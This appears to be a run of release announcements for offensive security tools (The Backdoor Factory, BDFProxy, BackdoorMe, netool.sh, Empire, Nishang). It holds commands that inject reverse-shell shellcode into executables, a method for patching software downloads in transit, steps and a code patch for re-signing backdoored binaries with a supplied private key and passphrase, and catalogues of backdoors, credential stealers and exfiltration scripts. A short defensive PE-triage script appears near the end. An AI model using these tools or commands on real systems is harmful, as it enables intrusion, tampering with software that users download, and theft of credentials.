Channel: Backdoor – Security List Network™

BDFProxy (The Backdoor Factory Proxy) version-0.3.7 released.


For security professionals and researchers only.

Changelog v0.3.7 :
– removing dependencies on python_magic and libmagic

BDFProxy v0.3.7

This script rides on two libraries for usage: The Backdoor Factory (BDF) and the mitmProxy.
Concept:
Patch binaries during download ala MITM.
Why:
Because a lot of security tool websites still serve binaries via non-SSL/TLS means.
Here’s a short list:

sysinternals.com
Microsoft - MS Security Essentials
Almost all anti-virus companies
Malwarebytes
Sourceforge
gpg4win
Wireshark
etc...

+ Supported Environment:

Tested on all Kali Linux builds, whether a physical beefy laptop, a Raspberry Pi, or a VM, each can run BDFProxy.

Install:
BDF is in bdf/
Run the following to pull down the most recent:

./install.sh

OR:

git clone https://github.com/secretsquirrel/the-backdoor-factory bdf/
If you get a certificate error, run the following:

mitmproxy
and exit with [Ctrl+C] after mitmProxy loads.

Usage:

Update everything before each use:

./update.sh

 READ THE CONFIG!!!

-->bdfproxy.cfg

You will need to configure your C2 host and port settings before running BDFProxy. DO NOT overlap C2 PORT settings between different payloads. You’ll be sending linux shells to windows machines and things will be segfaulting all over the place. After running, there will be a metasploit resource script created to help with setting up your C2 communications. Check it carefully. By the way, everything outside the [Overall] section updates on the fly, so you don’t have to kill your proxy to change settings to work with your environment.

But wait! You will need to configure your mitm machine for mitm-ing! If you are using a wifiPineapple, I modded a script put out by Hak5 to help you with configuration. Run ./wpBDF.sh and enter the correct configs for your environment. This script configures iptables to push only http (non-ssl) traffic through the proxy. All other traffic is forwarded normally.

Then:

./bdf_proxy.py

Here’s some sweet ascii art for possible physical placements of the proxy:
Lan usage:

<Internet>----<mitmMachine>----<userLan>

WIFI Usage :

<Internet>----<mitmMachine>----<wifiPineapple>))

Testing:

Suppose you want to test your setup using Firefox with FoxyProxy.

    Update your config as follows:
    transparentProxy = False

    Configure FoxyProxy to use BDFProxy as a proxy.
    Default port in the config is 8080.

+ Logging:

We have it. The proxy window will quickly fill with massive amounts of cat links depending on the client you are testing. Use tail -f proxy.log to see what is getting patched and blocked by your blacklist settings. However, keep an eye on the main proxy window if you have chosen to patch binaries manually: things move fast and behind the scenes traffic is multi-threaded, but the initial requests and responses are locking for your viewing pleasure.

+ Attack Scenarios (all with permission of targets):
-Evil Wifi AP
-Arp Redirection
-Physical plant in a wiring closet
-Logical plant at your favorite ISP

Download version :
BDFProxy-0.3.7.tar.gz(15.91 KB)
BDFProxy-0.3.7.zip(14.42 KB)  | Our Post Before | Source : https://github.com/secretsquirrel

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr


The Backdoor Factory (BDF) v-3.2.3 released : Patch PE, ELF, Mach-O binaries with shellcode.


NOTICE: For security professionals and researchers only.
Changelog 11/13/2015 v2.3.2:

– proper removal of PE Sig resulting in better IAT patching
– pebin.py : proper truncation of unsigned PE
– backdoor.py : proper truncation of unsigned PE

Update:
– cd <your folder BDF>
– git pull

BDF v-2.3.2

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

(diagram: the Portable Executable format)

Features:
+ PE Files
+ ELF Files
+ Mach-O Files
+ Overall

Dependencies:
Capstone, using the ‘next’ repo until it is the ‘master’ repo: https://github.com/aquynh/capstone/tree/next
Pefile, most recent: https://code.google.com/p/pefile/

INSTALL:
./install.sh

This will install Capstone with the ‘next’ repo and use pip to install pefile.

UPDATE:
./update.sh

Documentation and Presentation:
– http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory
– http://www.youtube.com/watch?v=LjUN9MACaTs

Sample Usage:
Patch an exe/dll using an existing code cave:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch an exe/dll by adding a code section:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch a directory of exes:

./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
...output too long for README...

User supplied shellcode:

msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

Hunt and backdoor: Injector | Windows Only

The injector module will look for target executables to backdoor on disk.  It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.  
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

Download : the-backdoor-factory-3.2.3.zip the-backdoor-factory-3.2.3.tar.gz

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr
Source : https://github.com/secretsquirrel/the-backdoor-factory | Our Post Before

NOTICE: For security professionals and researchers only.

BackdoorMe – a powerful auto-backdooring utility.


Backdoorme is a simple utility that logs into a Linux machine and gives the user the option to install a slew of backdoors.

BackdoorMe is a powerful auto-backdooring utility. It has been tested on Kali Linux 2.0 and Ubuntu 14.04.

Currently enabled backdoors include:
+ Bash
+ Netcat
+ Netcat-traditional
+ Metasploit
+ Perl
+ Pupy
– Python: please run the dependencies Python script to install the necessary dependencies. Backdoorme requires Python 2.7 or higher.

Installation:

git clone https://github.com/Kkevsterrr/backdoorme <Your Clone Folder Name>
cd <your Folder>
python dependencies.py
python master.py

Source: https://github.com/Kkevsterrr

netool.sh version 4.6 codename ‘Single_byte_XOR’ released : MitM PENTESTING OPENSOURCE T00LKIT.


Changelog v-4.6:
The toolkit was codenamed ‘Single_byte_XOR’ because this version focuses on obfuscating payloads: it adds the Shellter PE injector and different msf encoders with different iterations to evade AV detection (Windows binaries). The tool also ships with the new automated exploit ‘web_delivery’, which executes the 2nd stage in RAM without touching disk.
We now have 5 modules that try to evade AV detection (Windows):
2 – Backdooring EXE Files -> bdf_backdoor module
4 – Meterpreter (ReL1K) -> powershell payload
5 – Web_delivery (PSH/PYTHON) -> powershell or python
27 – Generate shellcode -> c-to-exe -> veil-evasion
29 – Shellter PE infector -> inject shellcode into windows binaries
☆ ☆ ☆ ☆ ☆
[ Upgraded ]
msfcli replaced by msfconsole

[ Bugs Fixed ]
+ ettercap IPV6 bug -> incorrect target selection
+ host-a-file -> phishing webpages displays under MitM
[ New Modules ]
+ MitM ROUTER phishing -> capture router credentials
+ unicorn.py -> HTA drive-by URL payload execution
+ java.jar phishing -> Drive-by URL payload execution
+ adobe_flash_hacking_team_uaf -> exploit + mitm + dns_spoof
+ web_delivery msf module -> python or powershell payloads
+ Shellter PE injector (by kyREcon) binaries windows obfuscator

[ Improved ]
+ netool toolkit Gnu Public License (GPL) display
+ build shortcut to toolkit -> gnome-desktop-item-edit
+ file-selection GUI to ettercap -> zenity displays added
+ host-a-file attack -> zenity file-selection GUI added
+ windows payloads encoding (diferent msf encoders/interactions)

Operative Systems Supported:
+ Linux-Ubuntu | Linux-kali | Parrot security OS | backbox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

netool- version 4.6 codename Single_byte_XOR

Netool: a toolkit written in bash, Python and Ruby that lets you automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap for MitM attacks. It simplifies tasks such as sniffing TCP/UDP traffic, Man-In-The-Middle attacks, SSL sniffing, DNS spoofing, DoS attacks on WAN/LAN networks and TCP/UDP packet manipulation using etter-filters; it can capture pictures from a target's web browsing (driftnet) and uses macchanger to change the MAC address as a decoy for scans.

Rootsector: a module that automates attacks combining DNS_SPOOF and MitM (phishing / social engineering) using the Metasploit, Apache2 and Ettercap frameworks, such as generating payloads, shellcode and backdoors that are delivered by dns_spoof and MitM redirection of a target to your phishing webpage.

Recently the “inurlbr” web scanner (by cleiton) was introduced; it searches for SQL-related bugs using several search engines and can be used in conjunction with other frameworks like nmap (using the --comand-vul flag).

Installation:

git clone git://git.code.sf.net/p/netoolsh/opensource-kali opensource
cd opensource
chmod +x INSTALL.sh
./INSTALL.sh

Note for version 4.6: you must install manually from the source download:
tar xf *.tar.gz
cd your folder
./INSTALL.sh
Update type: u

Example: 

inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27
-s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

Operative Systems Supported:
Linux-Ubuntu | Linux-kali | Parrot security OS | backbox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

“TOOLKIT DEPENDENCIES”
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip

“SCANNER INURLBR.php”
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

Download : Ubuntu: opensource.tar.gz (26.9 MB)  | Kali-Linux: opensource[kali].tar.gz(26.9 MB)
Source : http://sourceforge.net/projects/netoolsh/
Our Post Before : http://seclist.us/netool-sh-v-4-5-2-released-mitm-pentesting-opensource-t00lkit.html

Empire v1.3.6 released : PowerShell post-exploitation agent.


Changelog v-1.3.6:
– Combined persistence/debugger/* into persistence/misc/debugger
– Added SysWow64 option to management/spawn to spawn a 32-bit powershell.exe
– Added persistence/userland/backdoor_lnk
– Built several modules in management/mailraider/* to integrate @xorrior’s MailRaider.ps1
– Merged @xorrior’s FoxDump and ChromeDump modules.
– Merged @rvrsh3ll’s lateral_movement/invoke_sshcommand

empire-v1.3.6

Update:
– cd your empire folder
– git pull

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Empire Module Menu

Initial Setup:
Run the ./setup/install.sh script. This will install the few dependencies and run the ./setup/setup_database.py script. The setup_database.py file contains various settings that you can manually modify, and then initializes the ./data/empire.db backend database. No additional configuration should be needed; hopefully everything works out of the box.
Running ./empire will start Empire, and ./empire --debug will generate a verbose debug log at ./empire.debug. The included ./data/reset.sh will reset/reinitialize the database and launch Empire in debug mode.

Download : v1.3.zip | v1.3.0.tar.gz | Our Post Before | Clone Url
Source : http://www.powershellempire.com | https://github.com/PowerShellEmpire

Empire v1.3.7 released : PowerShell post-exploitation agent.


Changelog v-1.3.7:
– Updated powerview.ps1
– Added situational_awareness/network/powerview/get_cached_rdpconnection
– Added situational_awareness/network/powerview/set_ad_object
– Added management/downgrade_account
– Added credentials/mimikatz/cache

empire-1-3-7

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Empire Module Menu

Installation using git:

git clone https://github.com/PowerShellEmpire/Empire
cd Empire/setup
./install.sh
python setup_database.py    # set up the database
./empire

Update:
cd Empire
git pull

Initial Setup:
Run the ./setup/install.sh script. This will install the few dependencies and run the ./setup/setup_database.py script. The setup_database.py file contains various settings that you can manually modify, and then initializes the ./data/empire.db backend database. No additional configuration should be needed; hopefully everything works out of the box.
Running ./empire will start Empire, and ./empire --debug will generate a verbose debug log at ./empire.debug. The included ./data/reset.sh will reset/reinitialize the database and launch Empire in debug mode.

Download : v1.3.zip | v1.3.0.tar.gz | Our Post Before | Clone Url
Source : http://www.powershellempire.com | https://github.com/PowerShellEmpire

Nishang v-0.6.1 – PowerShell for penetration testing and offensive security.


Changelog v0.6.1:
+ Added Show-TargetScreen to the Gather directory.

DESCRIPTION
This script uses MJPEG to stream a target’s desktop in real time. With the -Reverse switch it connects out to a standard netcat listening on a port; alternatively, when bound to a specific port, a standard netcat can connect to it.
A netcat listener which relays the connection to a local port can be used as the listener. A browser which supports MJPEG (Firefox) should then be pointed at the local port to see the remote desktop.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Nishang v-0.6.1 released: PowerShell for penetration testing and offensive security.

Scripts: Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak : Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster, FireListener : A pair of scripts for egress testing.
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.

– Keylogger : Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade : Dump user passwords in plain text on Windows 8.1 and Server 2012.
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– Create-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote : Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay : Create network relays between computers.

+ Prasadhak
– Prasadhak : Check hashes of running processes against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
– Powerpreter : All the functionality of Nishang in a single script module.

+ Shells :
– Invoke-PsGcat : Send commands and scripts to a specified Gmail account to be executed by Invoke-PsGcatAgent.
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence : Remove persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip(708 KB) | Our Post Before
Source : http://www.labofapenetrationtester.com/

The Backdoor Factory (BDF) v-3.3.0 – Patch PE, ELF, Mach-O binaries with shellcode.


Changelog v3.3.0:
+ Added PE code signing support. You must provide your own code signing cert. See the full write-up on how to add PE code signing to Backdoor Factory (BDF).

BDFactory-v-3-3-0 Test Run Using PE Code Signing

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

(diagram: the Portable Executable format)

Features:
+ PE Files
+ ELF Files
+ Mach-O Files
+ Overall

Dependencies:
Capstone, using the ‘next’ repo until it is the ‘master’ repo: https://github.com/aquynh/capstone/tree/next
Pefile, most recent: https://code.google.com/p/pefile/

INSTALL:

git clone https://github.com/secretsquirrel/the-backdoor-factory
cd the-backdoor-factory
./install.sh

This will install Capstone with the ‘next’ repo and use pip to install pefile.

UPDATE:
./update.sh

Documentation and Presentation:
– http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory
– http://www.youtube.com/watch?v=LjUN9MACaTs

Sample Usage:
Patch an exe/dll using an existing code cave:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch an exe/dll by adding a code section:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch a directory of exes:

./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
...output too long for README...

User supplied shellcode:

msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

Hunt and backdoor: Injector | Windows Only

The injector module will look for target executables to backdoor on disk.  It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.  
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

Code signing certificate configuration:

git clone git://git.code.sf.net/p/osslsigncode/osslsigncode osslsigncode
./autogen.sh
./configure
make
sudo make install

Navigate to your BDF home directory.

the-backdoor-factory git:(master) $
curl -O https://www.duosecurity.com/static/files/DellCertificates.zip
mkdir certs
unzip DellCertificates.zip -d certs

Extract the private key from the PFX:

openssl pkcs12 -in certs/Verisign.pfx -nocerts -out certs/VerisignPrivateKey.pem
Enter Import Password: t-span
MAC verified OK
Enter PEM pass phrase: moomoo
Verifying - Enter PEM pass phrase: moomoo

Let's test everything out:

curl -O http://live.sysinternals.com/tcpview.exe # yay http

osslsigncode extract-signature -in tcpview.exe -out sig.txt

hexdump -C sig.txt

(screenshot: hexdump of the signature extracted from tcpview.exe)

Test run:

osslsigncode -certs certs/Verisign.cer -key certs/VerisignPrivateKey.pem -n "Securitay" -in tcpview.exe -out tcpview_signed.exe -pass moomoo
osslsigncode extract-signature -in tcpview_signed.exe -out sig1.txt
hexdump -C sig1.txt

(screenshot: hexdump of the signature extracted from tcpview_signed.exe)

Now open pebin.py in your favorite editor, replace the code at line 1763 (just after the self.binary.close() call on line 1759) with the following, save, and test against your victim machine:

if self.ZERO_CERT is True:
    # cert was removed earlier; re-sign the patched file with our own cert
    p = subprocess.Popen(['osslsigncode', '-certs', 'certs/Verisign.cer', '-key',
                          'certs/VerisignPrivateKey.pem', '-n', 'Security', '-in',
                          self.flItms["backdoorfile"], '-out', self.flItms["backdoorfile"],
                          '-pass', 'moomoo'])
    p.wait()
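The sample runs above leave two structural traces in a patched PE: a data section whose flags are changed to make it executable ("Changing Section Flags") and a certificate table that is zeroed ("Overwriting certificate table pointer") or replaced by a signature from a certificate the author supplied. The following Python is an added defender's triage check, not code from BDF, BDFProxy or the original post: it parses the PE headers without any third-party library and reports sections that are both writable and executable, plus a missing Authenticode certificate table. The two test images are constructed inline (headers only, not runnable executables); the flag constants and header offsets are from the PE/COFF specification.

```python
import struct

# Section characteristic flags from the PE/COFF specification
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
SECURITY_DIR_INDEX = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY (Authenticode certificate table)


def inspect_pe(data):
    """Parse the PE headers in `data` and report two BDF-style artefacts:
    sections that are both writable and executable, and a missing
    certificate table. Raises ValueError for anything that is not a PE."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")

    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == PE32_MAGIC:
        dirs_off = 96       # data directory array starts here in a PE32 optional header
    elif magic == PE32PLUS_MAGIC:
        dirs_off = 112      # ... and here in PE32+
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)

    # NumberOfRvaAndSizes sits immediately before the directory array
    (num_dirs,) = struct.unpack_from("<I", data, opt + dirs_off - 4)
    cert_off, cert_size = 0, 0
    if num_dirs > SECURITY_DIR_INDEX:
        cert_off, cert_size = struct.unpack_from(
            "<II", data, opt + dirs_off + 8 * SECURITY_DIR_INDEX)

    findings, sections = [], []
    table = opt + opt_size  # section table follows the optional header
    for i in range(num_sections):
        entry = table + 40 * i
        (raw_name,) = struct.unpack_from("<8s", data, entry)
        (flags,) = struct.unpack_from("<I", data, entry + 36)  # Characteristics
        name = raw_name.rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, flags))
        if flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE:
            findings.append("section %s is writable and executable" % name)

    if cert_size == 0:
        findings.append("no Authenticode certificate table (unsigned or signature stripped)")
    return {"sections": sections, "cert_table": (cert_off, cert_size), "findings": findings}


def build_test_pe(sections, cert_size):
    """Constructed minimal PE32 image (DOS stub, headers and section table only)
    used as sample input for inspect_pe; it is not a real executable."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * SECURITY_DIR_INDEX,  # security directory
                     0x1000 if cert_size else 0, cert_size)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii").ljust(8, b"\0"),
                    0x1000, 0x1000 * (i + 1), 0x200, 0x400 * (i + 1), 0, 0, 0, 0, flags)
        for i, (name, flags) in enumerate(sections))
    return dos + b"PE\0\0" + coff + bytes(opt) + table


# Constructed samples: a signed binary with ordinary section flags ...
CLEAN_PE = build_test_pe(
    [(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
     (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)],
    cert_size=0x800)

# ... and the same layout after a cave patch: .data made executable, cert table zeroed
PATCHED_PE = build_test_pe(
    [(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
     (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
               | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE)],
    cert_size=0)

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_PE), ("patched", PATCHED_PE)):
        print(label, inspect_pe(blob)["findings"] or ["no findings"])
```

This is header triage only: a writable-and-executable data section is unusual for compiler-produced binaries and a zeroed certificate table on a file that the vendor normally signs is a strong hint that it was modified in transit or on disk. It does not validate a signature that is present, so a binary re-signed with a certificate that does not chain to a trusted root (as in the code signing section above) must still be caught by real Authenticode verification, for example osslsigncode verify on Linux or signtool verify /pa on Windows, and by comparing the file hash against the vendor's published value.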

Download : the-backdoor-factory-3.3.0.zip the-backdoor-factory-3.3.0.tar.gz

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr
Source : https://github.com/secretsquirrel/the-backdoor-factory | Our Post Before

NOTICE: For security professionals and researchers only.


BDFProxy (The Backdoor Factory Proxy) version-0.3.8 released.


For security professionals and researchers only.

Changelog v0.3.8 12/20/2015:
+ Added configuration options in bdfproxy.cfg to support PE code signing from BDF (CODE_SIGN). See the BDF README for details.

